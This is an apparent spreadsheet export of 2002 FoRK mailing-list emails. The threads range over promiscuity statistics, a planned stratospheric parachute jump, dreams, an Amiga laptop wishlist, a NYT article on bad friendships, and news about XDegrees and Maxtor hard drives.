promiscuity among gay men. You can read about it in Randy Schiltz's And the 
Band Played On. He writes about  bathhouse culture pre-HIV; he also discusses 
how, in the gay politics of the time, there was a sub-culture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Schiltz's book was to condemn the role that it and  bathhouse culture played 
in spreading the AIDs epidemic that eventually killed Schiltz, among so many 
others. This doesn't let Eugen off the hook--but it is accurate to say that 
there was a  cult of promiscuity that was particular to the gay community.Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Chris Haun wrote:
&gt; 
&gt; We would need someone to sit in the studio 24/7 writing down all this info -
&gt; which sometimes isn't available, like from earlier album that don't have
&gt; serial numbers and barcodes. Then still if only the magic 18 people
&gt; webstream our signal, the price would become quite exponential since we play
&gt; on average 16 songs an hour, we'd be paying $22.11 everyday to stream to
&gt; those 18 people. So really, it does have to do with the internet tax, but it
&gt; is a few reasons together why we can't do it after their kill-date. :(Who is John Galt?(RoUS in the throes of reading Atlas Shrugged again)
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">At 8:16 AM -0700 on 9/9/02, Gordon Mohr wrote:&gt;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otherwise.That math stuff's, a, um, bitch, i'nit?;-)Cheers,
RAH
[Who could care less who boinks whom, or for how much, though watching the
Righteous Anger(tm) around here this morning *has* been amusing...]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</si>
  <si>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Why so fast?  Normal terminal velocity is much slower.&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; bitbitch@magnesium.net
&gt; Sent: Sunday, September 08, 2002 8:36 AM
&gt; To: (Robert Harley)
&gt; Cc: fork@spamassassin.taint.org
&gt; Subject: Re: The Big Jump
&gt; 
&gt; 
&gt; 
&gt; So uh, would this qualify for the Darwin awards if he doesn't make it?
&gt; 
&gt; Freaking french people...
&gt;    :-)
&gt; -BB
&gt; RH&gt; Today a French officer called Michel Fournier is supposed to get
in a
&gt; RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
km
&gt; RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
reach
&gt; RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
the
&gt; RH&gt; end, although with an automatic backup if he is 7 seconds from the
&gt; RH&gt; ground and still hasn't opened it.
&gt; 
&gt; RH&gt; R
&gt; 
&gt; RH&gt; ObQuote:
&gt; RH&gt;   "VederÃ², si averÃ² si grossi li coglioni, come ha il re di
Franza."
&gt; RH&gt;   ("Let's see if I've got as much balls as the King of France!")
&gt; RH&gt;   - Pope Julius II, 2 January 1511
&gt; 
&gt; 
&gt; 
&gt; --
&gt; Best regards,
&gt;  bitbitch                            mailto:bitbitch@magnesium.net</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t xml:space="preserve">John Hall wrote:&gt;Why so fast?  Normal terminal velocity is much slower.
&gt;  
&gt;
Not at 40,000 m. I found this article 
(http://www.wired.com/news/print/0,1294,53928,00.html) :"The last person to try to break the highest free fall record died in 
the attempt. In 1965, New Jersey truck driver Nick Piantanida suffered 
catastrophic equipment failure when his facemask blew out at 57,000 
feet. Lack of oxygen caused such severe brain damage that he went into a 
coma and died four months later."And in amongst the flash at
http://www.legrandsaut.org/site_en/you can discover that he will break the sound barrier at 35,000 m,
presumably reaching top speed somewhere above 30,000.Owen&gt;  
&gt;
&gt;&gt;-----Original Message-----
&gt;&gt;From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt;&gt;bitbitch@magnesium.net
&gt;&gt;Sent: Sunday, September 08, 2002 8:36 AM
&gt;&gt;To: (Robert Harley)
&gt;&gt;Cc: fork@spamassassin.taint.org
&gt;&gt;Subject: Re: The Big Jump
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;So uh, would this qualify for the Darwin awards if he doesn't make it?
&gt;&gt;
&gt;&gt;Freaking french people...
&gt;&gt;   :-)
&gt;&gt;-BB
&gt;&gt;RH&gt; Today a French officer called Michel Fournier is supposed to get
&gt;&gt;    
&gt;&gt;
&gt;in a
&gt;  
&gt;
&gt;&gt;RH&gt; 350-metre tall helium balloon, ride it up to the edge of space (40
&gt;&gt;    
&gt;&gt;
&gt;km
&gt;  
&gt;
&gt;&gt;RH&gt; altitude) and jump out.  His fall should last 6.5 minutes and
&gt;&gt;    
&gt;&gt;
&gt;reach
&gt;  
&gt;
&gt;&gt;RH&gt; speeds of Mach 1.5.  He hopes to open his parachute manually at
&gt;&gt;    
&gt;&gt;
&gt;the
&gt;  
&gt;
&gt;&gt;RH&gt; end, although with an automatic backup if he is 7 seconds from the
&gt;&gt;RH&gt; ground and still hasn't opened it.
&gt;&gt;
&gt;&gt;RH&gt; R
&gt;&gt;
&gt;&gt;RH&gt; ObQuote:
&gt;&gt;RH&gt;   "VederÃ², si averÃ² si grossi li coglioni, come ha il re di
&gt;&gt;    
&gt;&gt;
&gt;Franza."
&gt;  
&gt;
&gt;&gt;RH&gt;   ("Let's see if I've got as much balls as the King of France!")
&gt;&gt;RH&gt;   - Pope Julius II, 2 January 1511
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;--
&gt;&gt;Best regards,
&gt;&gt; bitbitch                            mailto:bitbitch@magnesium.net
&gt;&gt;    
&gt;&gt;
&gt;
&gt;
&gt;  
&gt;
</t>
  </si>
  <si>
    <t>On Mon, Sep 09, 2002 at 11:01:22AM -0700, John Hall wrote:
&gt; Why so fast?  Normal terminal velocity is much slower.Terminal velocity can be calculated by $v_{T} = \sqrt{\frac{2mg}{CpA}}$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'87 a guy named Gregory Robertson noticed a fellow parachutist Debbie 
Williams had been knocked unconscious. He shifted so that he was head down,
hit about 200 mi/h, and caught up with her and pulled her chute with 10 seconds
to spare.-- 
njl</t>
  </si>
  <si>
    <t>more accurately: someone's dream changes reality for everyone, and
everyone's memory adjusts to perceive the new realities as a continuum,
replete with new pasts and new memories.ever have dreams that "create" their own history to make their irrealities
plausible and authentic feeling?ever notice how the feelings evoked in some dreams stick with you all day?
i'm sure it's some neurochemical process initiated during the dream that is
still cycling thru - like a deja vu, triggered by memory processes, where
you don't actually remember but you feel like you're remembering.ggggggggg-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
Hall
Sent: Monday, September 09, 2002 2:03 PM
To: FoRK
Subject: RE: Recommended Viewing
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</si>
  <si>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 xml:space="preserve">On Monday 09 September 2002 09:51 pm, Geege Schuman wrote
&gt; ever notice how the feelings evoked in some dreams stick with you all
&gt; day?i'm sure it's some neurochemical process initiated during the dream
&gt; that is still cycling thru - like a deja vu, triggered by memory
&gt; processes, where &gt; you don't actually remember but you feel like you're
&gt; remembering.Absolutely, and I've wanted to recapture it.  I've done some writing based 
on dreams, and there is a mysterious "mood" to that feeling that drives 
some creative stuff for me.  I've never tried to write music in that 
state, but I will next time.Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Any of your writing online anywhere?  Would love to take a look.  I was 
plagued with night terrors for years and tried to capture that feeling 
after waking up (if you want to call that waking up), but was never able 
to...
CindyOn Mon, 9 Sep 2002, Eirikur Hallgrimsson wrote:&gt; On Monday 09 September 2002 09:51 pm, Geege Schuman wrote
&gt; &gt; ever notice how the feelings evoked in some dreams stick with you all
&gt; &gt; day?i'm sure it's some neurochemical process initiated during the dream
&gt; &gt; that is still cycling thru - like a deja vu, triggered by memory
&gt; &gt; processes, where &gt; you don't actually remember but you feel like you're
&gt; &gt; remembering.
&gt; 
&gt; Absolutely, and I've wanted to recapture it.  I've done some writing based 
&gt; on dreams, and there is a mysterious "mood" to that feeling that drives 
&gt; some creative stuff for me.  I've never tried to write music in that 
&gt; state, but I will next time.
&gt; 
&gt; Eirikur
&gt; 
&gt; 
&gt; -- 
"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman  writes:    G&gt; ...  i'm sure it's some neurochemical process initiated during
    G&gt; the dream that is still cycling thru - like a deja vu,
    G&gt; triggered by memory processes, where you don't actually
    G&gt; remember but you feel like you're remembering.That's very perceptive of you.  Many people are not so willing to
accept their personal reality as skewed by their neuro-physiology.  A
great many popular con games exist by exploiting the perceptions of
these states.Another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Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson  writes:    E&gt; Absolutely, and I've wanted to recapture it.  I don't know about this /particular/ mood, but I have used
neuro-conditioning with aiding children in stressful
life-circumstances.Basically,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it's not perfect (like you
get with simpler brains) but it is an inescapable effect.This is probably the neuro-effect that leads to performance-enhancing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 http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, for one, it would free up the similar laptop I already got to
just run Amithlon (or if that wasn't so fun, bsd) to run just OpenBSD!This is a near-term thing I could look forward to!However, an 'official' laptop seems unexciting to me with only
the items mentioned.  Most important are the particulars distinguishing
the listed spec from a Dell 2650, preferably:
1- GeForce4 440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energy-efficient GPU is a good sideeffect and
    portability (read: battery lifetime) enabler.)1.5- Great control over CPU state; by use of 'internet keys'
    wired to BIOS/bhipset routines directly or preferably a scroll
    wheel.  Also, hibernate that works, please.1.7- Bootable to USB 2.0 drives (e.g. larger external ones)
    in BIOS, please.2- P4 Dells overheat.  They have a big heatsink and a little fan
   to pull air through it, and if you don't elevate thelaptop off
   the desk or table or bed it's on, the fan will -stay- on.  Not good
  for MTBS (mean time between service; unless you've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(i.e. in the form of a catch-handle
  and second logo device behind the laptop, which generally
  provides stow and attachment for elevation legs (move them
  out farther to get to the next-higher ekevation, until the sides
  of the laptop are met.)  This also happens to provide a little
  protection for USB 2  and 1394 cables that I tend to keep
  plugged in all the time (a bit longer port life? Please.) 3-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lightpipe/CF assembly, with
   its backreflector, and the whole warrantee.  This provides
   for excellent outdoor use, often with the diffuser reinserted
   to keep depth-of-field distractions minimised.
     What would I like?  A1200 putty color, any translucency,
   in or over a rosewood-colored (in KDE color browser, I see
   chocolate, firebrick and a couple of 'indian red' that are great
   candidates) base.  
      I would also like to be able to at least turn off the backlight
    without closing the lid, and to be -able- to fit an -external-
    light source such as a UV-filtered solar collector (and glare
    hood) to feed
    into the backlight.  Not only does this make an excellent 
    color environment but lets one work outdoors tolerably.
      The logo should be a coloration of a
   minimal surface, as the MAA is trying to get me to renew
   with:  demos at http://astronomy.swin.edu.au/pbourke/geometry/
   at first blush.  We'll see what comes out of the contest and
   maybe you'll like the mapping MathCAD does of the
   logo to a minimal surface or manifold that reflects the
   openness of AmigaOS, Ami* and Amiga community.
   MAA.org has more references, I'm sure.4- Obviously Elfin details., e,g, the backlight inlet.Other details:
USB2.x preferred; FireWire would be needed if that's unavailable.
Options like 802.11b or attabhable WiFi hub for ethernet port
should round out the offering.  An option for just-released 
.13 micron P4 (with mobile power features) could make more
reviewers greenlight the series; much better power consumption,
and almost certainly a higher a top clock come with that.
CompactFlash, SmartMedia and MMC flash memory card
interfaces would be very pleasant.  I've mentioned booting to
USB, and booting from CF would be a pleasant extigency also.
To that end, a backup solution with compression using
USB 2 storage or the multimode drive is always a nice 
bundle item; that or a chance to back out a patch under 3 OS.....
Blue skies (and clear water and fresh air): 
Waterproof to 30 feet, 3 Ethernet ports plus onboard WiFi.
Svelte; 3-line frontpanel LCD and bright red pager LED,
builtin G4 cellphone functions, choice of side and 
frontpanel trim: Ivory-like stuff inscribed with M68k memory map
and various OS 3.9 structures or textured fur that
says 'This is Amiga Speaking' when stroked 'round. 
Decent keyboard, as in Toshiba or IBM laptops; perhaps 
an ergonomic fingerworks.com device (they work as 
keyboard and mouse) as the keyboard/trackpad.
2 Directional planar mics atop AMLCD; soundcard with multiple 
18 bit A-D and noise reduction DSP that work in our
(second-through-fourth, at least) favorite OS.
Actual 7" bellows pulls out at nominal ventilation 
fan location for real void-comp (the test in Blade
Runner) style cooling and extended bass; active cooling
and airfiltering is available to adjust humidity at user
seat and provide mineral water.
HyperTransport ports.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Ned Jackson Lovely wrote:&gt; In '87 a guy named Gregory Robertson noticed a fellow parachutist Debbie 
&gt; Williams had been knocked unconscious. He shifted so that he was head down,
&gt; hit about 200 mi/h, and caught up with her and pulled her chute with 10 seconds
&gt; to spare.IIRC it's ~180 km/s spreadeagled and ~210 km/h head-down.
</t>
  </si>
  <si>
    <t xml:space="preserve">you meant "SURPRISINGLY perceptive," didn't you?  :-)recent exceptionally vivid and strange dreams lead me to believe i'm
sparking synapses that have lain dormant lo these many years.  Lots of
problem solving going on up there at night.-----Original Message-----
From: garym@maya.dyndns.org [mailto:garym@maya.dyndns.org]On Behalf Of
Gary Lawrence Murphy
Sent: Monday, September 09, 2002 11:16 PM
To: Geege Schuman
Cc: johnhall@evergo.net; FoRK
Subject: Re: Recommended Viewing
&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman  writes:    G&gt; ...  i'm sure it's some neurochemical process initiated during
    G&gt; the dream that is still cycling thru - like a deja vu,
    G&gt; triggered by memory processes, where you don't actually
    G&gt; remember but you feel like you're remembering.That's very perceptive of you.  Many people are not so willing to
accept their personal reality as skewed by their neuro-physiology.  A
great many popular con games exist by exploiting the perceptions of
these states.Another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Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Gordon Mohr:
&gt;It was clear you were talking about averages. But it should 
&gt;be equally clear that that isn't what people mean when they
&gt;use the word "promiscuity". Sigh.This sprung out of a report linked by Cindy about the promiscuity of
female monkeys with males other than the alpha male, i.e, specifically
not the tail end of the distribution.  "By mating with as many
extra-group males as possible, female langurs ensure [etc.]"
&gt;OK, then. Consider a population of 1,000,000. 500,000 men each
&gt;pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
&gt;also has sex with the other 499,999 womenThis has never happened.  Its relevance is nil.
&gt;Averages are useful, sure -- but much more so if called by their 
&gt;actual name, rather than conflated with another concept.So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AFAIC.R
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman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105.For example, don't look now but your shoes are full of feet.The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 http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10 Sep 2002, Gary Lawrence Murphy wrote:--]It's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
--]For example, don't look now but your shoes are full of feet.Nice imagery. When the filters come down ( choose your method)it is very
much the case. Not  only are your shoes full of toes, but your toes are
full of bones, blood , muscle and toejam. All these things are
evident...unless you got your  filters up.Life, the ultimate spam:)--tom
</t>
  </si>
  <si>
    <t xml:space="preserve">
I'm not sure which way to make
the old bits call on this:[A] 
was posted well after
[B] 
was in the archives, but then
again, [B] didn't bother with
any commentary (new bits).If you two can agree upon who
was at fault, penance will be
to explain how feedback phase
is affected by time lags, and
tie that in to the spontaneous
generation of "business cycles"
in the Beer Game. *-Dave* see also:Explaining Capacity Overshoot and Price War: Misperceptions
  of Feedback in Competitive Growth Markets 
in which the scenario 4 (margin
oriented tit for tat) seems close
to the strategy described in:"game theoretical gandhi / more laptops"</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
has been sent to you by khare@alumni.caltech.edu.
Sure does explain FoRK :-)not yet abandoned,
  Rohitkhare@alumni.caltech.edu
Some Friends, Indeed, Do More Harm Than GoodSeptember 10, 2002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I'm disbanding it." Another book, "When Friendship Hurts," by Dr. Jan Yager, a
sociologist at the University of Connecticut at Stamford,
advises deliberately leaving bad friends by the wayside.
"There's this myth that friendships should last a
lifetime," Dr. Yager said. "But sometimes it's better that
they end." That social scientists would wait until now to spotlight
the dangers of bad friends is understandable, considering
that they have only recently paid close attention to
friendship at all. Marriage and family relationships -
between siblings or parents and children -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50 percent divorce rate, have added weight to the
role of friends in emotional and physical health. "Now that a marital relationship can't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we're starting to look
at it as a more full relationship," said Dr. Suzanna Rose,
a professor of psychology at Florida International
University in Miami. "Like marriage, friendship also has
negative characteristics." The research is in its infancy. Psychologists have not yet
measured the ill effects of bad friendship, Dr. Fehr said.
So far they have only, through surveys and interviews,
figured out that it is a significant problem. The early
research, Dr. Fehr added, is showing that betrayal by a
friend can be more devastating than experts had thought. How can a friend be bad? Most obviously, Dr. Rose said, by
drawing a person into criminal or otherwise ill-advised
pursuit. "When you think of people who were friends at
Enron," she added, "you can see how friendship can support
antisocial behavior." Betrayal also makes for a bad friendship. "When friends
split up," said Dr. Keith E. Davis, a professor of
psychology at the University of South Carolina, "it is
often in cases where one has shared personal information or
secrets that the other one wanted to be kept confidential."
Another form of betrayal, Dr. Yager said, is when a friend
suddenly turns cold, without ever explaining why. "It's
more than just pulling away," she said. "The silent
treatment is actually malicious." At least as devastating is an affair with the friend's
romantic partner, as recently happened to one of Dr.
Lerner's patients. "I would not encourage her to hang in
there and work this one out," Dr. Lerner said. A third type of bad friendship involves someone who insults
the other person, Dr. Yager said. One of the 180 people who
responded to Dr. Yager's most recent survey on friendship
described how, when she was 11, her best friend called her
"a derogatory name." The woman, now 32, was so devastated
that she feels she has been unable to be fully open with
people ever since, Dr. Yager said. Emotional abuse may be less noticeable than verbal abuse,
but it is "more insidious," Dr. Yager said. "Some people
constantly set up their friends," she explained. "They'll
have a party, not invite the friend, but make sure he or
she finds out." Risk takers, betrayers and abusers are the most extreme
kinds of bad friends, Dr. Yager said, but they are not the
only ones. She identifies 21 different varieties. Occupying
the second tier of badness are the liar, the person who is
overly dependent, the friend who never listens, the person
who meddles too much in a friend's life, the competitor and
the loner, who prefers not to spend time with friends. Most common is the promise breaker. "This includes everyone
from the person who says let's have a cup of coffee but
something always comes up at the last minute to someone who
promises to be there for you when you need them, but then
isn't," Dr. Yager said. Some friendships go bad, as some romantic relationships do,
when one of the people gradually or suddenly finds reasons
to dislike the other one. "With couples, it can take 18 to 24 months for someone to
discover there's something important they don't like about
the other person," said Dr. Rose of Florida International.
"One might find, for example, that in subtle ways the other
person is a racist. In friendships, which are less intense,
it may take even more time for one person to meet the
other's dislike criteria." Whether a friendship is worth saving, Dr. Lerner said,
"depends on how large the injury is." "Sometimes the mature thing is to lighten up and let
something go," she added. "It's also an act of maturity
sometimes to accept another person's limitations." Acceptance should come easier among friends than among
spouses, Dr. Lerner said, because people have more than one
friend and do not need a full range of emotional support
from each one. But if the friendship has deteriorated to the point where
one friend truly dislikes the other one or finds that the
friendship is causing undue stress, the healthy response is
to pull away, Dr. Yager said, to stop sharing the personal
or intimate details of life, and start being too busy to
get together, ever. "It takes two people to start and maintain a friendship,
but only one to end it," Dr. Yager said. Friendship, because it is voluntary and unregulated, is far
easier to dissolve than marriage. But it is also
comparatively fragile, experts say. Ideally, the loss of a
bad friendship should leave a person with more time and
appreciation for good ones, Dr. Lerner said. "It is wise to pay attention to your friendships and have
them in order while you're healthy and your life and work
are going well," she said. "Because when a crisis hits,
when someone you love dies, or you lose your job and your
health insurance, when the universe gives you a crash
course in vulnerability, you will discover how crucial and
life-preserving good friendship is."http://www.nytimes.com/2002/09/10/health/psychology/10FRIE.html?ex=1032684795&amp;ei=1&amp;en=2a88a6d1b985c977HOW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t>
  </si>
  <si>
    <t>Robert Harley writes:
&gt; &gt;OK, then. Consider a population of 1,000,000. 500,000 men each
&gt; &gt;pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
&gt; &gt;also has sex with the other 499,999 women
&gt; 
&gt; This has never happened.  Its relevance is nil.It was a extreme contrived example because you glosded over the 
point of the earlier 3-person example. But OK, Mr Math, let it be N men and women, for any N&gt;2. They 
all pair off. Then, some number H, N&gt;H&gt;0, of men has sex with 
all the other N-1 women he hasn't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you.Further, and I was hoping this would be clear without saying
so outright, this model actually approximates the cliche 
"common wisdom" about per-gender sexual behavior, if you 
reverse the male and female roles.Those stereotypes are: that more men than women seek multiple
partners -- men being "more promiscuous" than women -- and that 
surplus of male interest is satisfied by a smaller number of 
hyperpromiscuous women (often derisively labelled "sluts").&gt; So I chose not to type "on average" explicitly in my post, since this
&gt; is FoRK and one tends to assume that people have a clue.
&gt; 
&gt; There is no disagreement between us, except that I am more interested
&gt; in typical behaviour and you in extreme. Nope, now you've amended the meaning of your initial statement to
make it more defensible. What I objected to was:Robert Harley:
# &gt;The assumption that females of all species tend to be less promiscuous
# &gt;than males simply does not fit the facts, Hrdy contended.
# 
# Well, DUH!!!
# 
# It is perfectly obvious that (heterosexual) promiscuity is exactly,
# precisely identical between males and females.
# 
# Of course the shapes of the distributions may differ.If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didn't you adopt the 
typical definition of "promiscuous", rather than a straw-man
definition which allowed you to interject "DUH!!" and mock an
anthrolopology professor's conclusions? &gt; Actually, you probably just
&gt; had a bad day and felt like jumping down my throat for the hell of it.You are welcome to that theory!But here's an alternate theory: when you jump in with a patronizing 
and overblown pronouncement -- e.g. "DUH!!... perfectly obvious... 
exactly, precisely identical..." -- and that pronouncement is 
itself sloppy and erroneous, then others may get a kick out of 
popping your balloon. - Gordon</t>
  </si>
  <si>
    <t>dreams-are-like-radio analogy: i program my Jetta Monsoon for Planet 93.3,
80's 102.9, and NPR 89.9 but when i leave my local broadcast range i have to
scan for new stations. dreaming is outside my local broadcast range.-----Original Message-----
From: garym@maya.dyndns.org [mailto:garym@maya.dyndns.org]On Behalf Of
Gary Lawrence Murphy
Sent: Tuesday, September 10, 2002 10:14 AM
To: Geege Schuman
Cc: johnhall@evergo.net; FoRK
Subject: Re: Recommended Viewing
&gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman  writes:    G&gt; you meant "SURPRISINGLY perceptive," didn't you?  :-)Of course, dear.  Especially without zazen training.  Veritably
Operational Thetan-like.    G&gt; recent exceptionally vivid and strange dreams lead me to
    G&gt; believe i'm sparking synapses that have lain dormant lo these
    G&gt; many years.  Lots of problem solving going on up there at
    G&gt; night.It's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105.For example, don't look now but your shoes are full of feet.The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 http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)</t>
  </si>
  <si>
    <t xml:space="preserve">
==
http://siliconvalley.internet.com/news/article.php/10862_1460701Microsoft Tuesday said it has purchased a Mountain View, Calif.-based
security company to better secure its core file services including its
Windows platform and .NET initiative.The Redmond, Wash-based software giant has acquired the assets of XDegrees
for an undisclosed amount of cash and is in the process of relocating the
team of 12 or 14 engineers to the Microsoft campus.XDegrees' technology assigns URLs to Word files, video clips, and other
digital documents for access across a peer-to-peer networkXDegrees founder Michael Tanne was offered a job, but decided instead to
play his hand in the Silicon Valley.
=========="XDegrees' technology assigns URLs to Word files, video clips, and other
digital documents for access across a peer-to-peer network" - assigns URLs
to Word files... and somebody /bought/ that?===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quickly."Whoa... high tech...===
More bits here...
http://www.openp2p.com/pub/a/p2p/2001/04/27/xdegrees.html"The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t>
  </si>
  <si>
    <t xml:space="preserve">I like this part - sounds like httpd on the client...http://www.openp2p.com/pub/a/p2p/2001/04/27/xdegrees.html"Once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doesn't have to reload when a new page is
loaded, as JavaScript functions do.And because XDegrees uses Web-compatible technology, users can access
XDegrees resources without installing any software, simply by using their
browser."===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in-house
applications.""Files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
  </si>
  <si>
    <t>Mr. FoRK writes:
&gt; "Files can be cached on multiple systems randomly scattered around the
&gt; Internet, as with Napster or Freenet. In fact, the caching in XDegrees is
&gt; more sophisticated than it is on those systems: users with high bandwidth
&gt; connections can download portions, or "stripes," of a file from several
&gt; cached locations simultaneously. The XDegrees software then reassembles
&gt; these stripes into the whole file and uses digital signatures to verify that
&gt; the downloaded file is the same as the original. A key component of this
&gt; digital signature is a digest of the file, which is stored as an HTTP header
&gt; for the file."This "more sophisticated than [Napster or Freenet]" part seems
to be the same behavior implemented in many other P2P CDNs, 
such as:  - Kazaa
  - EDonkey/Overnet
  - BitTorrent
  - Gnutella (with HUGE extensions)
  - OnionNetworks WebRAID...though the quality of the "digest" used by each system varies
wildly.- Gordon</t>
  </si>
  <si>
    <t xml:space="preserve">At 12:32 PM 12/28/00 -0600, Adam Rifkin wrote:&gt;I repeat, IBM 76.8Gb ultra dma/100 hard drive at Fry's for $375...
&gt;"home of fast, friendly courteous service! (R)"
&gt;
&gt;I kid you not.  That's a half a cent a Megabyte for storage.
&gt;Not El Cheapo storage but top of the line storage.less than two years later, we have 320 GB for the same price:http://www.shareholder.com/maxtor/news/20020909-89588.cfmMaxtor Driving Capacity-Centric Enterprise Apps With "Super-Sized" ATA DrivesMaxtor Continues its Leadership in the Market it Pioneered with a New 
Category of High-Density ATA DrivesMILPITAS, Calif., September 9, 2002-Maxtor Corporation (NYSE: MXO), a worldwide leader in hard disk drives and 
data storage solutions, today announced Maxtor MaXLineTM, its newest 
generation of ATA drives designed specifically for rapidly emerging 
enterprise storage applications including near-line, media storage and 
network storage. The MaXLine family features two critical differentiators: 
huge capacities up to 320 GB for corporate archiving and media recording; 
and unique manufacturing and quality for 24/7 operations with mean time to 
failure (MTTF) rates exceeding one million hours.The MaXLine family is designed to bring hard disk drives into "near-line" 
archive applications. By adding a layer of MaXLine drives to archive 
architectures, companies can instantly recover time-critical data including 
executive e-mail, transaction data and accounting data that may need to be 
recovered on demand.These new drives are designed to solve another enterprise problem with the 
storage of video, media and audio conference call files. Even compressed, 
these files take up tremendous amounts of high-cost server space. Priced 
starting around $299.95 to $399.95 MSRP, Maxtor's MaXLine family offers 
high capacity drives for enterprise applications at price points between 
traditional ATA and SCSI drives.For system OEMs and white box builders, MaXLine offers high-density, 
easy-to-integrate storage for use in entry-level and mid-size server 
environments."The demand for instant recall of archived data is expanding as companies 
are meeting their obligations to quickly access executive e-mails,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applications."The MaXLine family includes the 5400-RPM MaXLine II, designed for 
capacities up to 320 GB and the 7200-RPM MaXLine Plus II, designed for 
capacities up to 250 GB. At these capacities, MaXLine offers higher storage 
density than many tape and optical solutions. These drives have also been 
tested and are projected to meet enterprise reliability requirements, 
already exceeded by prior drives employing the same robust Maxtor designs, 
which exceed MTTF of over one million hours. These drives will also carry a 
three-year warranty.The MaXLine II and MaXLine Plus II feature the Maxtor Fast DriveTM 
UltraATA/133 interface for data transfer speeds up to 133 MB per second. 
The MaXLine II and MaXLine Plus II will be available with next-generation 
serial ATA interface for higher performance. At 150 MB per second maximum 
data transfer rate, serial ATA improves hard drive performance to keep pace 
with the rapidly increasing performance requirements of data intensive 
environments and enterprise applications.With a point-to-point connection architecture, and rich command set for 
managing hard drive activity and data flow along the interface, serial ATA 
advances the performance and efficiency of the drive to system interface. 
The interface's reduced pin count allows for simpler cabling which in turn 
allows better airflow within a system and further benefits the user with 
increased design flexibility and hot plug capability."Maxtor's MaXLine family of drives provide a solution for storing data that 
has previously been too expensive to keep on disk," said Dave Reinsel, 
analyst at IDC. "The ATA drives offer a great value, low cost per GB and 
when integrated into storage systems and file servers offer a compelling 
cost-effective alternative to tape libraries and optical drives, which have 
been the traditional solutions used for near-line applications."Availability
Limited qualification units of the parallel ATA versions of Maxtor MaXLine 
II and MaXLine Plus II are now available; with volume units available in 
the fourth quarter. Qualification units of the MaXLine II and MaXLine Plus 
II with serial ATA will be available later this month with volume shipments 
scheduled to begin in the first quarter of 2003.About Maxtor
Maxtor Corporation (www.maxtor.com) is one of the world's leading suppliers 
of information storage solutions. The company has an expansive line of 
storage products for desktop computers, storage systems, high-performance 
servers and consumer electronics. Maxtor has a reputation as a proven 
market leader built by consistently providing high-quality products and 
service and support for its customers. Maxtor and its products can be found 
at www.maxtor.com or by calling toll-free (800) 2-MAXTOR. Maxtor is traded 
on the NYSE under the MXO symbol.Note: Maxtor, MaXLine and the Maxtor logo are registered trademarks of 
Maxtor Corporation. Fast Drive is a trademark of Maxtor Corporation. All 
other trademarks are properties of their respective owners.GB means 1 billion bytes. Total accessible capacity varies depending on 
operating environment.This announcement relating to Maxtor may contain forward-looking statements 
concerning future technology, products incorporating that technology, and 
Maxtor's execution. These statements are based on current expectations and 
are subject to risks and uncertainties which could materially affect the 
company's results, including, but not limited to, market demand for hard 
disk drives, the company's ability to execute future production ramps and 
utilize manufacturing assets efficiently, pricing, competition, and the 
significant uncertainty of market acceptance of new products.  These and 
other risk factors are contained in documents that the company files with 
the SEC, including the Form 10-K for fiscal 2001 and its recent 10-Qs.Copyright Â© 2001, Maxtor Corporation Â®. Privacy Policy.-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "U" == Udhay Shankar N  writes:    U&gt; At 12:32 PM 12/28/00 -0600, Adam Rifkin wrote:
    &gt;&gt; I repeat, IBM 76.8Gb ultra dma/100 hard drive at Fry's for
    &gt;&gt; $375...  "home of fast, friendly courteous service! (R)"    U&gt; less than two years later, we have 320 GB for the same price:So then why does my webhost _still_ only give me 200MB?-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
 Business Advantage through Community Software : http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">September HaikuFreezing my ass off
Air conditioning on high
heats small apartment.
Cindy, in Mississippie
P.S. this one's for you, geege.On Tue, 10 Sep 2002, Paul Chvostek wrote:&gt; 
&gt; I can tell I'm not the only one without air conditioning.  ;-)
&gt; 
&gt; Maybe I'll move to Canmore.  
&gt; 
&gt; p
&gt; 
&gt; 
&gt; On Tue, Sep 10, 2002 at 03:37:08PM -0400, Swerve wrote:
&gt; &gt; 
&gt; &gt; moo hahahaha.
&gt; &gt; 
